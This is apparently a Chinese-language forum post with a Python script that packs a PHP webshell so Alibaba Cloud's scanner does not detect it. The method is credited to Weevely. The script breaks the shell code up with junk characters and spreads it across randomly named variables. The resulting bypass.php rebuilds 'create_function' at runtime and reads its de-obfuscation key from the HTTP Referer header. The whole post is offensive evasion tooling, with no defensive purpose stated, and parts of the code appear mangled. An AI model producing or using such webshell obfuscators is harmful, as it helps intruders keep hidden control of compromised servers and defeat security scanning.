51工具盒子过不了阿里云 原理是来自于Weevely工具
#!/usr/bin/python3
import random
import string
#这里输自定义干扰字符
add_interfere_str='CnM'
Referer = 'https://developer.mozilla.'+ add_interfere_str +'.org/testpage.html'
notice = '//连接Referer:' + Referer
#发送webshell时记得传Referer的值,比如:Referer: [url]https://developer.mozilla.sTr.org/testpage.html[/url],其中sTr就是干扰字符,之后过滤要用到
def read_check():
open_file = open('shell.php', 'r',encoding='utf-8') #将shell.php替换为要转换的webshell文件名
read_file = open_file.readlines()
file = ''.join(read_file)
file = file.replace("'", '"').replace('\n', '').replace('\t', '')
if file.startswith('<?php'):
file = file.lstrip('<?php')
file = file.rstrip('?>')
else:
print('这不是php代码')
return file
def interfere(file):
add_str = ''
rest_str = ''
num = 0
for i in file:
num += 1
if num == 3: # 间隔3个字符输入干扰,可自行替换
add_results = add_interfere_str.join(rest_str)
add_str += add_results
rest_str = ''
num = 0
rest_str += i
add_str += rest_str
temp_str = ''
array_str = []
for i in add_str:
num += 1
if num == 80: # 每隔80个字符分割字符串,可自行替换
array_str.append(temp_str)
temp_str = ''
num = 0
temp_str += i
array_str.append(temp_str)
return array_str
def var_name(array_str):
var_collect = []
array_add = []
for c in array_str:
random_str = ''.join(random.sample(string.ascii_letters, 3))
add_sentence = '$' + random_str + '=' + "'" + c + "'" + ";"
array_add.append(add_sentence)
var_collect.append(random_str)
return array_add,var_collect
def splicing(var_collect):
splicing_sentence = ''
for i in var_collect:
var_sentence = '.' + '$' + i
splicing_sentence += var_sentence
final = splicing_sentence.lstrip('.')
return final
def str_print(array_add,final):
fileName='bypass.php'
a ='<?php'
b = "$b =$_SERVER['HTTP_REFERER'];"
c = "$c = explode('.',$b);"
Tips = notice
interfere_str = "$interfere_str =$c[2]; "
aosp = a+'\n'+Tips+'\n'+b+'\n'+c+'\n'+interfere_str
with open(fileName,'a',encoding='utf-8')as file:
file.write(aosp)
file.close()
for i in array_add:
with open(fileName,'a',encoding='utf-8')as file:
file.write('\n'+i)
file.close()
#变量名为自定义,都可替换
l = "$l" + "=" + "str_replace($interfere_str,'',%s);" % (final)
k = "$k=str_replace($interfere_str,'','cre%sat%se_fu%snc%stio%sn');" % (add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str)
bb = "$bb = $GLOBALS'k'; "
ee = '$GLOBALS"bb";'
abvd = l+'\n'+k+'\n'+bb+'\n'+ee+'\n'+'?&gt;'
with open(fileName,'a',encoding='utf-8')as file:
file.write(abvd)
file.close()
def main():
file = read_check()
array_str = interfere(file)
array_add,var_collect = var_name(array_str)
final = splicing(var_collect)
str_print(array_add,final)
ifname== 'main': main()
